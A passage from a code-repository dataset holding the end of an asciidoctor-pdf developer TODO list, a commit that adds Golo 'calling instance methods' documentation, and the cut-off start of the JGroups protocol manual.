admonition_icon_<name>_stroke_color\n - description_list_term_font_style\n - header\/footer\n* SIMPLE: mark required keys (assume keys are optional by default)\n - required keys can never have a null value; most are set by base theme\n* add URL to chronicles example that contains a character reference, such as pass:[&]\n* allow links to be underlined (theme setting) (#567)\n* SIMPLE: document vw\/vh measurement units in theming guide (make it clear it only applies in certain cases)\n* SIMPLE: in theming guide, emphasize not using the fallback font when working with very large documents\n - explain that default theme uses a fallback font\n* FIXME: stop using fallback fonts in default theme (instead, bundle a fuller font)\n - using fallback fonts significantly slows down Prawn because it checks every letter every time (see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/lib\/prawn\/text\/formatted\/box.rb#L427-L434)\n* add broader character range to monospace font so we can drop fallback font by default (#282)\n - consider having a fallback for prose and fallback for literal\n* SIMPLE: recommend use of prawn-gmagick in README\n - https:\/\/github.com\/packetmonkey\/prawn-gmagick\n - must install GraphicsMagick-devel on Fedora\n* use ImageMagick (or GraphicsMagick) to uncompress PNG images before reading them (could also just document this)\n - mention where we talk about prawn-gmagick in README\n* use <a id=\"\"><\/a> instead of <a name=\"\"><\/a> for anchor point in formatted text\n - benchmark to see if it's faster to use empty or non-empty element in parser\n* QUESTION: should we set pdf-anchor attribute on every node that has an id?\n - isn't it required for cross references to work?\n* new design for keep together; necessary to get exact height accounting for gaps at page breaks\n . in dry run, set to stop when advancing to next page (override on_page_create to throw exception)\n . if less than one page, return calculation (similar to what we do now)\n . if greater than one page, clear on_page_create; move to y offset of original and start dry run again; fix calculation\n . (if not keeping together, we can skip 1 and 2)\n* rename \"convert_content_for_\" since it can collide with existing blocks\n* rework resolve_image_path API so it's more logical; override based on type of first argument; document as option\n* don't orphan block title (make sure anchor stays with start of block)\n* QUESTION should we report full image path of gif in warning message when prawn-gmagick is not available?\n* QUESTION should we add destination to top of imported PDF page?\n - import page should accept id as section, optional argument\n* leading (line height) isn't applied when content is split across pages\n* generate fonts without PS Glyph Names to reduce file size\n - create script that can generate fonts entirely from original font source\n* if start_new_page is called at end of layout_chapter_title, and media=prepress, ghostscript reports an error\n - problem is no color space is set; can fix by calling update_colors before advancing to recto page in start_new_chapter\n - maybe introduce a skip_page helper to combine these operations?\n - upstream issues: https:\/\/github.com\/prawnpdf\/prawn\/issues\/951 and https:\/\/github.com\/prawnpdf\/prawn\/issues\/473\n* FILE ISSUE: cells in table head are wrapping by char, but don't set width of column\n - most prominent in auto-width tables\n* document how to test \/ use a PR\n - see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/462#issuecomment-246200953\n* break printed URIs at each forward slash (and perhaps at ? and & too) (#563)\n* add empty? method to Page (instead of page_empty? on document)\n* SIMPLE: add warning that AsciiDoc table cell content is not supported; print as raw source\n* FILE ISSUE: add option to svg method to not move cursor (in prawn-svg)\n* FILE ISSUE: prevent import_page from adding an extra page; leaves blank page when placing two inserts in a row\n - have import_page first delete current page if page is empty\n* FILE ISSUE: in prawn: go_to_page should accept second argument that is cursor position\n* UNRESOLVED: dry_run should start at cursor of main document (or as option); total height calculation would need to be revised\n - box_height isn't currently accurate when it spans more than one page\n - this should fix height calculation when content is split over a page break (leaving small amount of excess)\n - however, if cursor is advanced to fit content on page, then that excess will cause box_height to be too large\n - life would be simpler if Prawn allowed us to draw graphics at bottom layer\n* allow height of inline image to be set to line height (perhaps 1em?)\n* support pdfwidth for inline image\n* space around inline anchors\/index entries doesn't get collapsed by text formatter\n* add support for format attribute on image macro to image-related attributes such as title-page-background-image\n - support explicit image format for cover page image and page background image\n* introduce abstract-title attribute to complement preface-title?\n* need some sort of post_construct method for converter that receives document\n - inline convert methods can get called before init_pdf\n - monkeypatch?\n* backport resize method from prawn-svg and use it in converter\n* create document that explains how built-in fonts are generated and what subsets are selected\n - I need instructions for myself so I know how to update\/modify the fonts\n - document in theming guide what must be done to prepare fonts (old-style 'kern' table, optionally subset) (file issue!)\n* consider supporting icon tag in parser to simplify how inline icons are stored; simpler use of passthrough content\n* cache stateless cell data resolved from theme (don't need to recalc each time; at least per table)\n* autowidth on table doesn't work for multi-line content (prawn-table bases width calculation on normalized value)\n - table ends up being stretched even though it doesn't need to be\n* table logic: does the layout_table_caption have to be inside the table block? can we pre-calculate the actual width for the caption? does the table offer a callback we can use to keep the caption on the same page as the table?\n* introduce object to store\/organize running content data and specs\n* QUESTION: should theme font handle hierarchical keys (either explicitly or implicitly)\n* need to support .canvas role on image so it isn't shrunk to fit inside top\/bottom margins\n - perhaps .canvas, .canvas-x, .canvas-y\n* FILE ISSUE: when split source listing, add top padding to bounding box (or is it the line metrics top?)\n - perhaps this has to do with the a miscalculation in dry run when not starting from same y position?\n* should we print alt text if an error is caught when attempting to embed an image?\n* stroke and fill multi-page sidebar block (#259) and example block (#362)\n* support URL images in running content (need to delegate to resolve_image_path)\n* rewrite optimize-pdf using rghost (#535) (also see #21 and #22)\n - add Optimizer class; wire to cli (separate issue?)\n* add feature to number bullets according to section number (needed for OpenDevise agreements)\n* outline should link to title page if there's a cover page (skip cover page and ensuing blank page)\n* might be better to organize fragments of source chunks by lines (and pass that around) to simplify post-processing\n* support negative start value for list (#498)\n - need to count negative numbers in correct direction\n* margins\/paddings at page boundaries are strange, fragile\n* implement margin collapsing (between blocks)\n - would eliminate need for negative padding for blockquote\n* SIMPLE: submit pastie theme for Rouge upstream\n* bw theme for CodeRay (or Rouge) to match output of Pygments bw\n* the nested? method on list isn't checking if nested inside a block inside a list\n* wrapped lines in source listing should be indented to account for line number gutter (#504)\n* add sample SVG to content of chronicles-example.adoc (we do already use one for title page)\n* inline images: allow built-in font family names for SVG to be remapped\n* inline images: should we be passing absolute image path in tag or something relative (or even a lookup id?)?\n* support zero-leading integers (use dedicated type like w\/ roman numerals) in reversed order lists\n* large image runs into running footer (doesn't bottom margin need to be aligned with running footer height?)\n* should str_to_pt helper handle % and vw units?\n* allow style of visible link to be controlled by theme (similar to what we do in the manpage converter)\n* FILE ISSUE: should not wrap at formatting mark unless it is at a break opportunity\n - the problem here is that Prawn is allowing breaks at the boundaries of text fragments; it should only look at the contents\n* be more consistent with how examples are shown in theming-guide.adoc (do we show last segment only?)\n* allow top as alternative to margin_top for all elements on title page (#431)\n* swallowing exceptions! (any use of e.message in a string is dangerous)\n* allow ordered list marker to be prefixed by section number (a global setting?)\n* conum not aligned vertically with callout text (perhaps too small?)\n* conum should never wrap (push it into the text if necessary)\n* decouple theme settings for section titles and discrete headings\n* decouple listing\/literal\/source theme settings; currently all under code\n* replace explicit char ranges with classes in regexp (e.g., [[:word:]] or \\w)\n* devise a way to specify a value as a string literal (variable replacement only) in theme\n* apply calculated theme values after loading?\n* allow \"content\" in place of recto_content & verso_content for running header\/footer\n - still relevant after restructuring?\n* be more specific in theming guide as to where prose_margin_top and prose_margin_bottom apply\n* allow image to span width of page (role=canvas, role=canvas-x or role=canvas-y); if role is canvas or canvas-y, then it does not consume height\n - partially addressed by vw units\n* allow valign value to be a number (requires change to Prawn)\n* layout SVG without using keep_together (since we know all the dimensions)\n - fix SVG to a single page (check height + caption height)\n* allow background color to be set for chapter \/ heading\n* allow border to be set around block image\n* switch wolpertinger to howling grasshopper mouse\n* file issue in prawn to dispatch to image handler for images it doesn't know about\n* add brief mention in theming guide that deeper customizations can be achieved by extending the converter\n - reference infoq-minibook repo & blog post\n - document how to extend the converter, use Prawn\n* allow alignment of list to be set separately from base align (and perhaps a hint in document)\n* is https:\/\/github.com\/packetmonkey\/prawn-pdfimage a safer way than prawn-templates to import PDF as image?\n* rename ThemeLoader to ThemeReader (or ThemeManager)?\n* SIMPLE: document autofit option on verbatim blocks (in README?)\n* normalize step leaves space after endline (i.e., `\\n `) at a hard line break (doesn't seem to affect flow)\n\n* *margin per heading level* (#176)\n* can't put margin top on chapter (chapter_top?) (#576)\n* document how to override the Ruby code to get custom styling in the theming guide\n* convenience method to check if there's enough room for another line on page\n* allow font size in theme to be specified in em or %\n* allow dynamic background image with page number in path\n* running header\/footer covers content (perhaps just a limitation that needs to be documented)\n* document that palette-based transparent in PNGs is not supported\n* file issue for prawn to preserve space (even w\/ guards, spaces don't preserve over wrapped lines)\n - if this is fixed, we can remove all the guard indent code\n* file issue for prawn to support spacer fragments with fixed width \/ height and no text (or text is ignored in calculations)\n* file issue that prawn-svg messes with the cursor (need to explain how)\n* document limitations in README (such as no linear gradients in SVG, embedded images in SVG must be URL or inlined, PNGs must be flattened, etc)\n* document all permutations of image sizing\n* set vposition on title page logo image explicitly to avoid page overrun?\n\n* allow pdf-page-margin to be set in document\n - this is slighly more complicated now that we have mirror margins; perhaps can't set those from document?\n* verse has problems with wrapping if line is long (in what way?)\n* allow default kerning to be set using theme\n* keep line comment in front of callout number to aid copying?\n* rework pull request for source line numbers (combine with restore conum logic if conums are enabled)\n - also combine with the preserve_space logic\n* allow front cover and back cover image to be defined in theme as fallback; document in theming-guide\n* should we shorten the keys to front-cover and back-cover (since image is implied?)\n* keep caption with table (check for sufficient space); only for top placement since bottom placement is much harder\n* allow valign to be set on image block (vertical center in page for things like slides)\n* separate theme control for listing vs literal block (and maybe source too)\n* allow title page image \"bottom\" to be set instead of \"top\" (mutually exclusive)\n* rtl (see .\/sandbox\/rtl\/ folder)\n\n* pass macro doesn't work in source block when macro subs and highlighting are both enabled (#180)\n* enable cache_images option for prawn-svg (#223)\n* bind image_registry between scratch and main document so we don't process the same image more than once\n - need to do some testing\n* show SVG warnings if debug (or trace) is on\n* clean temporary files once per conversion? (file issue)\n* clear font paths in SVG interface so it doesn't scan system? (since it's not portable anyway)\n* title is being rendered 3 times (maybe one for scratch?); explain why in comments if normal\n* finish docs\/theming-guide.adoc\n - continue working on json schema for theme; try to generate keys section from it\n* rethink how we're handling line heights for fonts, then document carefully\n - look closer at line_height and line_height_length and see if we need to document other details\n* implement first-line indent for paragraphs (seems like conflict w\/ our text formatter)\n - option to not indent first paragraph in section\n - if you indent, perhaps drop the margin between paragraphs?\n* add index support\n* add entry to TOC for preamble\/preface\n* can we create fragments in converter instead of using the formatted text parser?\n* allow text alignment of prose to be set in document\n* don't issue warnings on scratch document\n* rake release seems messed up (tagging the wrong commit)\n* getting a line wrap break before comma if preceding word is emphasized (problem in Prawn wrapping)\n* toc\n - make dot leader style separate from title \/ number\n* running content\n - side margins (allow override, default to content margins)\n - numbered and unnumbered chapter and section titles (file issue)\n - chapter and section number (easily solved by previous)\n - separate running content for chapter page (by default uses normal content)\n* should we rename base_ to body_ to make it more familiar to CSS developers?\n* support !include in theme file (#571)\n* add cover page example to chronicles so people see how to use it\n* don't orphan a single line of paragraph (send it with a buddy line)\n - implement orphan sentences for paragraph\n* implement stem support\n - see asciidoctor-mathematical and asciidoctor-mathoid\n* fail gracefully if theme file cannot be found\n* expose theme variable on document (attr_reader?)\n* dedicated style for top\/bottom margin of outline list\n - allow margin top and bottom to be set for lists (applies to outer-most list)\n - allow spacing between nested lists levels be configured in theme\n* need dedicated theme styles for paragraph spacings, etc\n* recto\/verso indentation (on body?)\n* don't indent and draw line next to quote block unless width > 0 or color != transparent\n* subtitles for chapters\n* part titles need their own page and styling\n* add color calculation functions in theme file (like in SASS)\n* create utility method to get % offset of page as y value (option to constrain to bounds)\n* document converter assignment in convert_content_for_block method\n* support transparency for colors (this is now supported by resolve_theme_color)\n* support generic color (or value) attribute in formatted text parser instead of specific color systems (rgb, cmyk)\n* **allow theme_font to set line_height** (honor this setting from document)\n - theme setting for code line height (currently using base_line_height)\n* should we put an entry for doctitle in the outline if notitle is set? (need to test these edge cases)\n* add more theme control over toc (font size, style, color per level)\n* don't allow formatted text (e.g., monospace) in headings or toc entries\n* prevent title-logo-image from spilling to next page (same with title content)\n* document what each keep_together is doing \/ expects\n - keep_together really needs to pick up the inherited horizontal bounds or else measurement is inaccurate\n* code cleanups (regexps to constants, nil? checks and such)\n - split prawn_ext\/extensions into individual files based on function\n* enable line above (or below?) title on title page (file issue)\n - perhaps 4-sided border?\n* enable text transform for:\n - running content\n - admonition content\n - table foot row\n - table header cell\n - table (overall)\n - generic paragraph?\n - inline literal text\n - link\n - listing\/literal\/source block\n - global default\n* file upstream issue for Prawn to warn if it can't resolve a glpyh (or monkeypatch it)\n* support web fonts; use uri-cache to avoid redundant fetching\n* align caption to match alignment of block image\n* FILE ISSUE: attribute or role to control table shading (all, even, odd) (or call it striped like bootstrap?)\n - e.g., [.striped]\n - currently controlled by theme\n* make conum glyphs configurable in theme (use reference table to resolve)\n* do we still need the converter hack in convert_content_for_block? (seems to be needed for admonitions)\n* utility to coerce the color value transparent to nil (better handling in general)\n* CJK and\/or multilingual support (see https:\/\/github.com\/chloerei\/asciidoctor-pdf-cjk)\n* description list term should keep together with content (file issue)\n* allow font properties to be set for lists (description_list, outline_list)\n* hardbreak in table cell results in extra endline (likely not normalizing cell content)\n* remove pdfmarks file after optimizing\n* add note to README that Prawn will subset any fonts provided\n* look into single_line + shrink_to_fit in listings, perhaps other places\n* refactor as Prawn view to avoid method name conflicts (also see https:\/\/github.com\/prawnpdf\/prawn\/issues\/802)\n* create proper default (Asciidoctor) theme\n* document how the treetop parser is rebuilt\n* rework font so we can set actual height, calculate x_height internally (use 1em for spacings)\n* padding top and bottom on content affects height_of calculations (need to review)\n* code font needs to support more than just ascii (Golo license block is an example)\n* don't cutoff content in partintro\n* admonition styles are one big hack; need to be organized and based on theme\n* FILE ISSUE: can't change font properties of admonition block content\n* SIMPLE: add admonition_label_font_color to theme\n* BUG: autofit logic not working with Courier (still overrunning line)\n* honor safe mode rules\n* print scratch.pdf file if verbose \/ trace mode is on in Asciidoctor\n* introduce setting to indent section content\n* rename default theme to docbook theme, make default the Asciidoctor theme (should we have a base theme?)\n* allow relative font size for inline code to be set (perhaps a percentage or em value? there are problems with this in arranger)\n* apply line height metrics for table content\n - figure out how to adjust line height for monospaced cell content\n - figure out how to layout regular cell content to adjust for line height\n* document the typeset_text methods very clearly\n* move check for node.title? inside layout_caption\n* theme idea \/ tester: see sandbox\/ebook-learn_version_control_with_git-SAMPLE.pdf\n* make alternating page title position optional (via theme?)\n* fix passthrough placeholders that get caught up in syntax highlighting (see https:\/\/github.com\/asciidoctor\/asciidoctor\/blob\/master\/test\/blocks_test.rb#L2258-L2277)\n* FILE ISSUE list Preamble in TOC\n - perhaps only if it has a title? or should we use a default title if one isn't specified?\n* honor font defs in SVG (to get M+ 1p); prawn-svg supports loading fonts; need to pass fonts to prawn-svg\n* should we support % as a unit in theme (divides by 100 and sets float value)?\n* disable monospace font color (and family?) in headings\n* add source language to upper-left corner of listing block\n\n* implement quote style from default Asciidoctor stylesheet\n* reorganize Prawn extensions (see prawn-table for example)\n* rename \"theme\" to \"style\"?\n* restrict custom theme path to jail (or load from load_path)\n* implement convert_toc\n* italic text in a line of text styled as bold in the theme loses its bold style\n\n* introduce method for start_initial_page?\n* make outline a document option (perhaps \"outline\" like \"toc\")\n* add bench\/ directory for the script to test the speed of the formatted text parser\n* start page numbering on page 1 (use \/PageLabels reference to make i the title page number)\n - add this feature upstream to Prawn\n* *report image only page w\/ stamps corruption issue to Prawn*\n - still true?\n* add \/PageMode \/UseOutlines\n* cli arguments\n - theme (pdf-style, pdf-stylesdir)\n - enable\/disable writing pdfmarks file\n - optimize-pdf\n* implement footnotes correctly (#73, #85)\n* flesh out outline more (in what way?)\n* flesh out title page more\n - document subtitle (partially solved)\n* don't create title page for article doctype (#95, #105)\n - only create title page if doctype=book\n* allow character spacing to be controlled by theme\n* might be able to avoid dry run for listing\/literal in obvious cases; engineering estimate\n* implement index of index terms (#386)\n\n* use treetop to parse and evaluate theme file\n* use or don't use pad method? check performance\n\n== Major Efforts \/ Milestones\n\n* add a test suite\n* refactor as Prawn View\n* add support for AsciiDoc table cell content by writing custom Table::Cell implementation\n* add support for nested tables by writing custom Table::Cell implementation\n* add support for footnotes (as article or chapter endnotes)\n* rework text handling in Prawn to support line height natively\n\n== Documentation\n\n* \"Incorrect number of arguments in 'SCN' command\" happens when you add a stamp to an imported page\n* be mindful that layout_prose adds margin to bottom of content by default (important when working in a bounding box)\n* ttfunk does not support ligatures (e.g., fi -> \ufb01); we could do this manually in post_replacements\n\n== Notes\n\n* when using `single_line: true` on formatted_text, it's necessary to reapply our padding top\/bottom from line metrics\n* we always leave cursor on start of page we're about to write on; certain checks rely on this fact\n* \"section title\" is the semantic element; \"heading\" is the structural element\n* \/PageLabels\/Nums must have entry for every page in front matter, even if a blank page\n - in fact, must account for every page or else numbering lags behind when scrolling document\n* if we set the vposition on image to a numeric value, it skips the overrun check that happens internally\n* any instance variables referenced by converter methods for inline nodes could get accessed before the converter for document is called\n* Evince throws warning when printing PDF if & is used in document title; but this is valid according to the PDF specification\n* Prawn drops fragments with empty text (hence the need to use zero-width space)\n - analyze_glyphs_for_fallback_font_support drops fragments with empty text\n - later on, initialize_wrap drops fragment with empty text\n* use term \"page number label\" to refer to the visible, printed page number (not the implicit page number)\n\n== Known Issues\n\n* inline image at start of the line is slighly shifted to the right due to the fact that it's placed in the center of the reserved fragment width; perhaps we are adding this padding\n\n== Potential Optimizations\n\n* if autofit is set on a listing\/literal block that has conums, we are splitting fragments by line twice\n* comparing > 0 is slightly faster than == 0 (for cases when we can swap the logic)\n\n== Usage Optimizations\n\n* uncompress PNG files to avoid slow zlib inflating step in Prawn\n* flatten PNGs (remove alpha channel) since it messes up font rendering on the page in Adobe Acrobat Reader (need to verify)\n* avoid the fallback font if possible (use full fonts in your theme) because it checks for *every* glyph\n* font families used in SVGs must match keys in the font catalog\n\n== Open Questions\n\n== Implementation\n\n* should we read SVG file using UTF-8 encoding; or does REXML handle encoding?\n* can we leverage before_rendering_page callback on table?\n* should we use move_past_bottom in some places instead of start_new_page?\n\n=== Design\n\n* remove\/reduce padding above heading when it appears at the start of a page?\n* Default line height?\n* Should the heading sizes be calculated according to the default font size?\n* Page margins\n* Body indentation?\n - recto \/ verso indentation?\n* Size of masthead \/ footer\n* Line separating masthead \/ footer?\n* Separate title page\n* Start chapter on new page?\n* Special layout for chapter page?\n\n=== Theme\n\n* keep or drop base_ prefix in theme? I think we should keep it because it provides context elsewhere in the document (e.g. $base_font_size vs $font_size)\n\n== Resources\n\n* https:\/\/code.google.com\/p\/origami-pdf\/[Origami PDF: A PDF inspection library]\n* https:\/\/github.com\/a1ee9b\/PrintPretty[A theme for PDF designed for printing]\n* http:\/\/randomtextgenerator.com[Random Text Generator, supports multiple languages]\n* http:\/\/clagnut.com\/blog\/2380[List of pangrams]\n - http:\/\/www.camcc.org\/_media\/reading-group\/qianziwen-en.pdf[1,000 character classic (Chinese)]\n* pdf2svg can convert the PDF file into an SVG (one SVG per page)\n* https:\/\/blog.codeship.com\/build-math-evaluation-engine[How to Build a Simple Math Evaluation Engine]\n* http:\/\/blog.typekit.com\/2011\/11\/03\/optimizing-fonts-for-the-web-unicode-values-glyph-set-underlines-and-strike-through\/[Optimizing Fonts for the Web]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a10675283bf065d6c47dcea43641343fd319063","subject":"Doc on calling methods","message":"Doc on calling methods\n","repos":"titimoby\/golo-lang,smarr\/golo-lang,smarr\/golo-lang,jeffmaury\/golo-lang,mojavelinux\/golo-lang,Mogztter\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference,jeffmaury\/golo-lang,mojavelinux\/golo-lang,Mogztter\/golo-lang,Mogztter\/golo-lang,jeffmaury\/golo-lang,titimoby\/golo-lang,franckverrot\/golo-lang,dynamid\/golo-lang-insa-citilab-historical-reference,dynamid\/golo-lang-insa-citilab-historical-reference,franckverrot\/golo-lang","old_file":"doc\/java-interop.asciidoc","new_file":"doc\/java-interop.asciidoc","new_contents":"== Java interoperability ==\n\nGolo aims at providing a seamless 2-way interoperability with the Java programming language.\n\n=== Calling static methods ===\n\nGolo can invoke public Java static methods by treating them as functions:\n\n[source,text]\n------------------------\nmodule sample\n\nimport java.util.Arrays\n\nfunction oneTwoThree = {\n return asList(1, 2, 3)\n}\n------------------------\n\nIn this example, `asList` is resolved from the `java.util.Arrays` import and called as a function.\nNote that we could equivalently have written a qualified invocation as `Arrays.asList(1, 2, 3)`.\n\n=== Calling instance methods ===\n\nWhen you have an object, you may invoke its methods using the `:` operator.\n\nThe following would call the `toString` method of any kind, then print it:\n\n[source,text]\n----------------------------------------\nprintln(\">>> \" + someObject: toString())\n----------------------------------------\n\nOf course, you may chain calls as long as a method is not of a `void` return type. Golo converts\nJava `void` methods by making them return `null`. This is neither a bug or a feature: the\n*invokedynamic* support on the JVM simply does so.\n\n=== Creating objects ===\n\nGolo doesn't have an instantiation operator like `new` in Java. Instead, creating an object and\ncalling its constructor is done as if it was just another function.\n\nAs an example, we may allocate a `java.util.LinkedList` as follows:\n\n[source,text]\n---------------------\nmodule sample\n\nimport java.util\n\nfunction aList = {\n return LinkedList()\n}\n---------------------\n\nAnother example would be using a `java.lang.StringBuilder`.\n\n[source,text]\n--------------------------------------\nfunction str_build = {\n return java.lang.StringBuilder(\"h\"):\n append(\"e\"):\n append(\"l\"):\n append(\"l\"):\n append(\"o\"):\n toString()\n}\n--------------------------------------\n\nAs one would expect, the `str_build` function above gives the `\"hello\"` string.\n\n=== Static fields ===\n\nGolo treats public static fields as function, so one could get the maximum value for an `Integer` as\nfollows:\n\n[source,text]\n--------------------------------------\nmodule samples.MaxInt\n\nlocal function max_int = {\n return java.lang.Integer.MAX_VALUE()\n}\n\nfunction main = |args| {\n println(max_int())\n}\n--------------------------------------\n\nNOTE: Given than most static fields are used as constants in Java, Golo does not provide support to\nchange their values. This may change in the future if compelling general-interest use-cases emerge.\n\n=== Inner classes and enumerations ===\n\nWe will illustrate both how to deal with public static inner classes and enumerations at once.\n\nThe rules to deal with them in Golo are as follows.\n\n1. Inner classes are identified by their real name in the JVM, with nested classes being separated\n by a `$` sign. Hence, `Thread.State` in Java is written `Thread$State` in Golo.\n2. Enumerations are just normal objects. They expose each entry as a static field, and each entry is\n an instance of the enumeration class.\n\nLet us consider the following example:\n\n[source,text]\n--------------------------------------------------------------------------\nmodule sample.EnumsThreadState\n\nimport java.lang.Thread$State\n\nfunction main = |args| {\n\n # Call the enum entry like a function\n let new = Thread$State.NEW()\n println(\"name=\" + new: name() + \", ordinal=\" + new: ordinal())\n\n # Walk through all enum entries\n foreach (element in atoList(Thread$State.values())) {\n println(\"name=\" + element: name() + \", ordinal=\" + element: ordinal())\n }\n}\n--------------------------------------------------------------------------\n\nRunning it yields the following console output:\n\n[source,console]\n------------------------------------------\n$ gologolo samples\/enums-thread-state.golo \nname=NEW, ordinal=0\nname=NEW, ordinal=0\nname=RUNNABLE, ordinal=1\nname=BLOCKED, ordinal=2\nname=WAITING, ordinal=3\nname=TIMED_WAITING, ordinal=4\nname=TERMINATED, ordinal=5\n$\n------------------------------------------\n\n=== Clashes with Golo operators and escaping ===\n\nBecause Golo provides a few named operators such as `is`, `and` or `not`, they are recognized as\noperator tokens.\n\nHowever, you may find yourself in a situation where you need to invoke a Java method whose name is\na Golo operator, such as:\n\n[source,text]\n-------------------------------------\n# Function call\nis()\n\n# Method call\nsomeObject: foo(): is(): not(): bar()\n-------------------------------------\n\nThis results in a parsing error, as `is` and `not` will be matched as operators instead of method\nidentifiers.\n\nThe solution is to use *escaping*, by prefixing identifiers with a backtick, as in:\n\n[source,text]\n---------------------------------------\n# Function call\n`is()\n\n# Method call\nsomeObject: foo(): `is(): `not(): bar()\n---------------------------------------\n\n\n","old_contents":"== Java interoperability ==\n\nGolo aims at providing a seamless 2-way interoperability with the Java programming language.\n\n=== Calling static methods ===\n\nGolo can invoke public Java static methods by treating them as functions:\n\n[source,text]\n------------------------\nmodule sample\n\nimport java.util.Arrays\n\nfunction oneTwoThree = {\n return asList(1, 2, 3)\n}\n------------------------\n\nIn this example, `asList` is resolved from the `java.util.Arrays` import and called as a function.\nNote that we could equivalently have written a qualified invocation as `Arrays.asList(1, 2, 3)`.\n\n=== Creating objects ===\n\nGolo doesn't have an instantiation operator like `new` in Java. Instead, creating an object and\ncalling its constructor is done as if it was just another function.\n\nAs an example, we may allocate a `java.util.LinkedList` as follows:\n\n[source,text]\n---------------------\nmodule sample\n\nimport java.util\n\nfunction aList = {\n return LinkedList()\n}\n---------------------\n\nAnother example would be using a `java.lang.StringBuilder`.\n\n[source,text]\n--------------------------------------\nfunction str_build = {\n return java.lang.StringBuilder(\"h\"):\n append(\"e\"):\n append(\"l\"):\n append(\"l\"):\n append(\"o\"):\n toString()\n}\n--------------------------------------\n\nAs one would expect, the `str_build` function above gives the `\"hello\"` string.\n\n=== Static fields ===\n\nGolo treats public static fields as function, so one could get the maximum value for an `Integer` as\nfollows:\n\n[source,text]\n--------------------------------------\nmodule samples.MaxInt\n\nlocal function max_int = {\n return java.lang.Integer.MAX_VALUE()\n}\n\nfunction main = |args| {\n println(max_int())\n}\n--------------------------------------\n\nNOTE: Given than most static fields are used as constants in Java, Golo does not provide support to\nchange their values. This may change in the future if compelling general-interest use-cases emerge.\n\n=== Inner classes and enumerations ===\n\nWe will illustrate both how to deal with public static inner classes and enumerations at once.\n\nThe rules to deal with them in Golo are as follows.\n\n1. Inner classes are identified by their real name in the JVM, with nested classes being separated\n by a `$` sign. Hence, `Thread.State` in Java is written `Thread$State` in Golo.\n2. Enumerations are just normal objects. They expose each entry as a static field, and each entry is\n an instance of the enumeration class.\n\nLet us consider the following example:\n\n[source,text]\n--------------------------------------------------------------------------\nmodule sample.EnumsThreadState\n\nimport java.lang.Thread$State\n\nfunction main = |args| {\n\n # Call the enum entry like a function\n let new = Thread$State.NEW()\n println(\"name=\" + new: name() + \", ordinal=\" + new: ordinal())\n\n # Walk through all enum entries\n foreach (element in atoList(Thread$State.values())) {\n println(\"name=\" + element: name() + \", ordinal=\" + element: ordinal())\n }\n}\n--------------------------------------------------------------------------\n\nRunning it yields the following console output:\n\n[source,console]\n------------------------------------------\n$ gologolo samples\/enums-thread-state.golo \nname=NEW, ordinal=0\nname=NEW, ordinal=0\nname=RUNNABLE, ordinal=1\nname=BLOCKED, ordinal=2\nname=WAITING, ordinal=3\nname=TIMED_WAITING, ordinal=4\nname=TERMINATED, ordinal=5\n$\n------------------------------------------\n\n=== Clashes with Golo operators and escaping ===\n\nBecause Golo provides a few named operators such as `is`, `and` or `not`, they are recognized as\noperator tokens.\n\nHowever, you may find yourself in a situation where you need to invoke a Java method whose name is\na Golo operator, such as:\n\n[source,text]\n-------------------------------------\n# Function call\nis()\n\n# Method call\nsomeObject: foo(): is(): not(): bar()\n-------------------------------------\n\nThis results in a parsing error, as `is` and `not` will be matched as operators instead of method\nidentifiers.\n\nThe solution is to use *escaping*, by prefixing identifiers with a backtick, as in:\n\n[source,text]\n---------------------------------------\n# Function call\n`is()\n\n# Method call\nsomeObject: foo(): `is(): `not(): bar()\n---------------------------------------\n\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"07ed0894550b1025d1b1edb1c322c070816872f3","subject":"Updated doc on FD_ALL suspect behavior","message":"Updated doc on FD_ALL suspect behavior\n","repos":"dimbleby\/JGroups,belaban\/JGroups,Sanne\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,dimbleby\/JGroups,pferraro\/JGroups,pruivo\/JGroups,rhusar\/JGroups,danberindei\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,Sanne\/JGroups,danberindei\/JGroups,pferraro\/JGroups,TarantulaTechnology\/JGroups,belaban\/JGroups,TarantulaTechnology\/JGroups,Sanne\/JGroups,pruivo\/JGroups,danberindei\/JGroups,rhusar\/JGroups,rhusar\/JGroups,pferraro\/JGroups","old_file":"doc\/manual\/protocols.adoc","new_file":"doc\/manual\/protocols.adoc","new_contents":"[[protlist]]\n\n== List of Protocols\n\nThis chapter describes the most frequently used protocols, and their configuration. _Ergonomics_\n(<<Ergonomics>>) strives to reduce the number of properties that have to be configured, by\ndynamically adjusting them at run time, however, this is not yet in place.\n \n\nMeanwhile, we recommend that users should copy one of the predefined configurations (shipped with JGroups), e.g.\n+udp.xml+ or +tcp.xml+, and make only minimal changes to it.\n\nThis section is work in progress; we strive to update the documentation as we make changes to the code.\n \n\n[[CommonProps]]\n=== Properties availabe in every protocol\n\nThe table below lists properties that are available in all protocols, as they're defined in the superclass\nof all protocols, org.jgroups.stack.Protocol.\n \n\n.Properties of org.jgroups.stack.Protocol\n[align=\"left\",width=\"90%\",cols=\"2,10\",options=\"header\"]\n|===============\n|Name|Description\n| stats | Whether the protocol should collect protocol-specific runtime statistics. What those\n statistics are (or whether they even exist) depends on the particular protocol.\n See the `org.jgroups.stack.Protocol` javadoc for the available API related to statistics.\n Default is true.\n \n|ergonomics | Turns on ergonomics. See <<Ergonomics>> for details.\n \n|id | Gives the protocol a different ID if needed so we can have multiple instances of it in\n the same stack\n|===============\n\n\n[[Transport]]\n=== Transport\n\n`TP` is the base class for all transports, e.g. `UDP` and `TCP`. All of the properties\ndefined here are inherited by the subclasses. The properties for `TP` are:\n \n\n${TP}\n\n`bind_addr` can be set to the address of a network interface, e.g. +192.168.1.5+.\nIt can also be set for the entire stack using system property +$$-Djgroups.bind_addr$$+, which\nprovides a value for bind_addr unless it has already been set in the XML config.\n \n\nThe following special values are also recognized for ++$$bind_addr$$++:\n \n\nGLOBAL:: Picks a global IP address if available. If not, falls back to a SITE_LOCAL IP address.\n\nSITE_LOCAL:: Picks a site local (non routable) IP address, e.g. from the +192.168.0.0+ or\n +10.0.0.0+ address range.\n\nLINK_LOCAL:: Picks a link-local IP address, from +169.254.1.0+ through\n +169.254.254.255+.\n\nNON_LOOPBACK:: Picks _any_ non loopback address.\n \nLOOPBACK:: Pick a loopback address, e.g. +127.0.0.1+.\n\nmatch-interface:: Pick an address which matches a pattern against the interface 